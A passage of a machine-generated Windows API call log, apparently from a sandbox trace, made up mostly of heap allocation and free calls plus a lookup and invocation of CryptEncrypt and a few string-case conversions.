HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e3558 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0190.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa2f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.280] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3bc8 [0190.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0190.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0190.281] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x5d75, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x5d78) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.284] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.284] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.284] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.285] CharLowerBuffW (in: lpsz="byte[23928]", cchLength=0xb | out: lpsz="byte[23928]") returned 0xb [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0190.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.287] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.287] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.287] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.288] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.288] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 